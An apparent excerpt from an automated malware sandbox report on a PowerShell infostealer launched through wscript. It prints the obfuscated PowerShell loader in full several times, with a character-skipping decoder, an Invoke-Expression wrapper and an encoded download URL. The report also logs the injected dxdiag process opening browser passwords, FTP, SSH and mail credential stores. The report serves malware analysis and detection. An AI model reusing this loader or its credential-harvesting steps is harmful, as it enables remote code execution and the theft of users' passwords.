aMyxoprSiliciGl.veaRntgenMadoqtBienn ');Unhandled (Dioptres ' ale$UrstrgSanitlS kkeo phavbScriba AnaclAmt g:EndurSBinyrtFanera FrafnI oeddNipp s Frere anadSca ae ryde=Mu ke$ ScatPThievaHypogtflippiGoneneBerennQuadrtSetopeViridrExcavnCylineErotisUnhu . Ne bsC.rcepcorralOv rdiFo,est Alko(pa.ro$RavinDC,regiSeps s SlidpDr,bboSpaltw ,arrdOrganeBa ysrUnder)Torch ');Unhandled (Dioptres 'Cross[FouriNHalvdeNonvat Duk,.DemulSB,sieeMediar fllevSweetiOsmancCoe.deCe,toPLyxosoIncooiSkiffnDrg.ttNedslMAttaca BolinNonteaChondgSaussePirrerVrvle]likvi:Germa:PlejeSSa ine PentcAar,tuSeks,rHjerniKirketA atryVarooPShamarRingroEmbrotBestsoP,ckpcSikk.oKl,mrl Slu Unad= lin f rsy[PajamNSandbeNrceitAberr. AvisS UnquekongecFiliouForfarBes,ai Asset Sen yCoaniPForwarUlykkoBubbetenkesoK.strc KopvoIn.eslGang TTransyTha.mp Drate Stam]C ron: Encl:Am siT,indblKonkusLadn.1shops2 Teat ');$Patienternes=$Standsede[0];$Fog Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\syswow64\dxdiag.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#inartistical turkisen reenforcement #>;$hollingsworth='tffelheltene';<#niveaudelen ufordjeligheds initiativriges honourarily husbukkens #>;$husspildevandet=$host.privatedata;if ($husspildevandet) {$antoecians++;}function dioptres($unjoint){$curvograph=$repolarized+$unjoint.length-$antoecians;for( $aftest=5;$aftest -lt $curvograph;$aftest+=6){$injoint+=$unjoint[$aftest];}$injoint;}function unhandled($gaggling){ . ($reprsenterende) ($gaggling);}$phoronomy=dioptres 'nitromint,mobergazs,nneiu derlkommalmat iamac.o/ star5agend.korpu0p rfo sinds(la.oowreacci sklennringdbaandoroun.wgrundsvirke alpegnunde tsnoha l,gen1tekno0 mass.p.rdo0tolkd;insuf fertw twinifldern murp6 skel4trans;sygem astox fo h6dal e4agers;.hili naz erprotevsu.er:cog i1s aak2vask.1p ani. ambu0their)sunny shelgridseeurfjecfolkekmaddio en,e/wheel2uncli0ko ce1skide0prebl0zo ia1firma0benz.1a kom fimreffahreidecidrdriftewind fstrudo,geerxud.ul/bo,ca1optra2 li h1bortk.skaml0 sejr ';$jordskorpens=dioptres 'ph nougy sus ba eeragger beha-flubbablowog out eduodenapo.ttdefin ';$patienternes=dioptres ' osetherhvetmora.tcoccopfibrasndlgn:mi ti/ elys/sk.ggddiu nrbag jipre evudfale knub.im.ergstiloo fraaohtt nglegeml e ekesolit.sparpccreamosalgsm wind/ frdiusi etcnavne?kni aeindspxsacchpectoboskat,rk nklt thon=slenddobli.ochirkwcrassnlbeselglasso b gnatopkodenang& progiudskidpluvi=orthi1 seizeturk 2varmt2tankrha rcastrknidcucu.r nelif anrglimplasherpeprubrilregiotd.scihsuppomuforfhcorr,emac r9acco.wtyggejtajiku erebg gorgqdyrticgiese-intertlagomb hist9unvexamymarxhjtekjarinblinter ';$dispowder=dioptres 'ruteb> turo ';$reprsenterende=dioptres 'v aleitoldke varmxeq,al ';$bytrafik='konfektionerings';$peninvariant='\tallowweed.kli';unhandled (dioptres 'pneum$predigpe tal onio kompbaboliasammelconca:nattegor.ngeriftmnstr,bd filaih ndsgsub etenchae aurnengrod ybeefishi=fae y$c ipse h frnassumvomb g: extra ignppan rptro jd wis a helbt kk,eabehnd+ onse$houghpmiosie.ruppnseminisilvan rimevaffe amyxoprsilicigl.vearntgenmadoqtbienn ');unhandled (dioptres ' ale$urstrgsanitls kkeo phavbscriba anaclamt g:endursbinyrtfanera frafni oeddnipp s frere anadsca ae ryde=mu ke$ scatpthievahypogtflippigoneneberennquadrtsetopeviridrexcavncylineerotisunhu . ne bsc.rcepcorralov rdifo,est alko(pa.ro$ravindc,regiseps s slidpdr,bbospaltw ,arrdorganeba ysrunder)torch ');unhandled (dioptres 'cross[fourinhalvdenonvat duk,.demulsb,sieemediar fllevsweetiosmanccoe.dece,toplyxosoincooiskiffndrg.ttnedslmattaca bolinnonteachondgsaussepirrervrvle]likvi:germa:plejessa ine pentcaar,tuseks,rhjernikirketa atryvaroopshamarringroembrotbestsop,ckpcsikk.okl,mrl slu unad= lin f rsy[pajamnsandbenrceitaberr. aviss unquekongecfiliouforfarbes,ai asset sen ycoanipforwarulykkobubbetenkesok.strc kopvoin.eslgang ttransytha.mp drate stam]c ron: encl:am sit,indblkonkusladn.1shops2 teat ');$patienternes=$standsede[0];$fog
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#inartistical turkisen reenforcement #>;$hollingsworth='tffelheltene';<#niveaudelen ufordjeligheds initiativriges honourarily husbukkens #>;$husspildevandet=$host.privatedata;if ($husspildevandet) {$antoecians++;}function dioptres($unjoint){$curvograph=$repolarized+$unjoint.length-$antoecians;for( $aftest=5;$aftest -lt $curvograph;$aftest+=6){$injoint+=$unjoint[$aftest];}$injoint;}function unhandled($gaggling){ . ($reprsenterende) ($gaggling);}$phoronomy=dioptres 'nitromint,mobergazs,nneiu derlkommalmat iamac.o/ star5agend.korpu0p rfo sinds(la.oowreacci sklennringdbaandoroun.wgrundsvirke alpegnunde tsnoha l,gen1tekno0 mass.p.rdo0tolkd;insuf fertw twinifldern murp6 skel4trans;sygem astox fo h6dal e4agers;.hili naz erprotevsu.er:cog i1s aak2vask.1p ani. ambu0their)sunny shelgridseeurfjecfolkekmaddio en,e/wheel2uncli0ko ce1skide0prebl0zo ia1firma0benz.1a kom fimreffahreidecidrdriftewind fstrudo,geerxud.ul/bo,ca1optra2 li h1bortk.skaml0 sejr ';$jordskorpens=dioptres 'ph nougy sus ba eeragger beha-flubbablowog out eduodenapo.ttdefin ';$patienternes=dioptres ' osetherhvetmora.tcoccopfibrasndlgn:mi ti/ elys/sk.ggddiu nrbag jipre evudfale knub.im.ergstiloo fraaohtt nglegeml e ekesolit.sparpccreamosalgsm wind/ frdiusi etcnavne?kni aeindspxsacchpectoboskat,rk nklt thon=slenddobli.ochirkwcrassnlbeselglasso b gnatopkodenang& progiudskidpluvi=orthi1 seizeturk 2varmt2tankrha rcastrknidcucu.r nelif anrglimplasherpeprubrilregiotd.scihsuppomuforfhcorr,emac r9acco.wtyggejtajiku erebg gorgqdyrticgiese-intertlagomb hist9unvexamymarxhjtekjarinblinter ';$dispowder=dioptres 'ruteb> turo ';$reprsenterende=dioptres 'v aleitoldke varmxeq,al ';$bytrafik='konfektionerings';$peninvariant='\tallowweed.kli';unhandled (dioptres 'pneum$predigpe tal onio kompbaboliasammelconca:nattegor.ngeriftmnstr,bd filaih ndsgsub etenchae aurnengrod ybeefishi=fae y$c ipse h frnassumvomb g: extra ignppan rptro jd wis a helbt kk,eabehnd+ onse$houghpmiosie.ruppnseminisilvan rimevaffe amyxoprsilicigl.vearntgenmadoqtbienn ');unhandled (dioptres ' ale$urstrgsanitls kkeo phavbscriba anaclamt g:endursbinyrtfanera frafni oeddnipp s frere anadsca ae ryde=mu ke$ scatpthievahypogtflippigoneneberennquadrtsetopeviridrexcavncylineerotisunhu . ne bsc.rcepcorralov rdifo,est alko(pa.ro$ravindc,regiseps s slidpdr,bbospaltw ,arrdorganeba ysrunder)torch ');unhandled (dioptres 'cross[fourinhalvdenonvat duk,.demulsb,sieemediar fllevsweetiosmanccoe.dece,toplyxosoincooiskiffndrg.ttnedslmattaca bolinnonteachondgsaussepirrervrvle]likvi:germa:plejessa ine pentcaar,tuseks,rhjernikirketa atryvaroopshamarringroembrotbestsop,ckpcsikk.okl,mrl slu unad= lin f rsy[pajamnsandbenrceitaberr. aviss unquekongecfiliouforfarbes,ai asset sen ycoanipforwarulykkobubbetenkesok.strc kopvoin.eslgang ttransytha.mp drate stam]c ron: encl:am sit,indblkonkusladn.1shops2 teat ');$patienternes=$standsede[0];$fog
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#inartistical turkisen reenforcement #>;$hollingsworth='tffelheltene';<#niveaudelen ufordjeligheds initiativriges honourarily husbukkens #>;$husspildevandet=$host.privatedata;if ($husspildevandet) {$antoecians++;}function dioptres($unjoint){$curvograph=$repolarized+$unjoint.length-$antoecians;for( $aftest=5;$aftest -lt $curvograph;$aftest+=6){$injoint+=$unjoint[$aftest];}$injoint;}function unhandled($gaggling){ . ($reprsenterende) ($gaggling);}$phoronomy=dioptres 'nitromint,mobergazs,nneiu derlkommalmat iamac.o/ star5agend.korpu0p rfo sinds(la.oowreacci sklennringdbaandoroun.wgrundsvirke alpegnunde tsnoha l,gen1tekno0 mass.p.rdo0tolkd;insuf fertw twinifldern murp6 skel4trans;sygem astox fo h6dal e4agers;.hili naz erprotevsu.er:cog i1s aak2vask.1p ani. ambu0their)sunny shelgridseeurfjecfolkekmaddio en,e/wheel2uncli0ko ce1skide0prebl0zo ia1firma0benz.1a kom fimreffahreidecidrdriftewind fstrudo,geerxud.ul/bo,ca1optra2 li h1bortk.skaml0 sejr ';$jordskorpens=dioptres 'ph nougy sus ba eeragger beha-flubbablowog out eduodenapo.ttdefin ';$patienternes=dioptres ' osetherhvetmora.tcoccopfibrasndlgn:mi ti/ elys/sk.ggddiu nrbag jipre evudfale knub.im.ergstiloo fraaohtt nglegeml e ekesolit.sparpccreamosalgsm wind/ frdiusi etcnavne?kni aeindspxsacchpectoboskat,rk nklt thon=slenddobli.ochirkwcrassnlbeselglasso b gnatopkodenang& progiudskidpluvi=orthi1 seizeturk 2varmt2tankrha rcastrknidcucu.r nelif anrglimplasherpeprubrilregiotd.scihsuppomuforfhcorr,emac r9acco.wtyggejtajiku erebg gorgqdyrticgiese-intertlagomb hist9unvexamymarxhjtekjarinblinter ';$dispowder=dioptres 'ruteb> turo ';$reprsenterende=dioptres 'v aleitoldke varmxeq,al ';$bytrafik='konfektionerings';$peninvariant='\tallowweed.kli';unhandled (dioptres 'pneum$predigpe tal onio kompbaboliasammelconca:nattegor.ngeriftmnstr,bd filaih ndsgsub etenchae aurnengrod ybeefishi=fae y$c ipse h frnassumvomb g: extra ignppan rptro jd wis a helbt kk,eabehnd+ onse$houghpmiosie.ruppnseminisilvan rimevaffe amyxoprsilicigl.vearntgenmadoqtbienn ');unhandled (dioptres ' ale$urstrgsanitls kkeo phavbscriba anaclamt g:endursbinyrtfanera frafni oeddnipp s frere anadsca ae ryde=mu ke$ scatpthievahypogtflippigoneneberennquadrtsetopeviridrexcavncylineerotisunhu . ne bsc.rcepcorralov rdifo,est alko(pa.ro$ravindc,regiseps s slidpdr,bbospaltw ,arrdorganeba ysrunder)torch ');unhandled (dioptres 'cross[fourinhalvdenonvat duk,.demulsb,sieemediar fllevsweetiosmanccoe.dece,toplyxosoincooiskiffndrg.ttnedslmattaca bolinnonteachondgsaussepirrervrvle]likvi:germa:plejessa ine pentcaar,tuseks,rhjernikirketa atryvaroopshamarringroembrotbestsop,ckpcsikk.okl,mrl slu unad= lin f rsy[pajamnsandbenrceitaberr. aviss unquekongecfiliouforfarbes,ai asset sen ycoanipforwarulykkobubbetenkesok.strc kopvoin.eslgang ttransytha.mp drate stam]c ron: encl:am sit,indblkonkusladn.1shops2 teat ');$patienternes=$standsede[0];$fog Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: dxdiag.exe PID: 8116, type: MEMORYSTR
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Windows\SysWOW64\dxdiag.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: Process Memory Space: dxdiag.exe PID: 8116, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs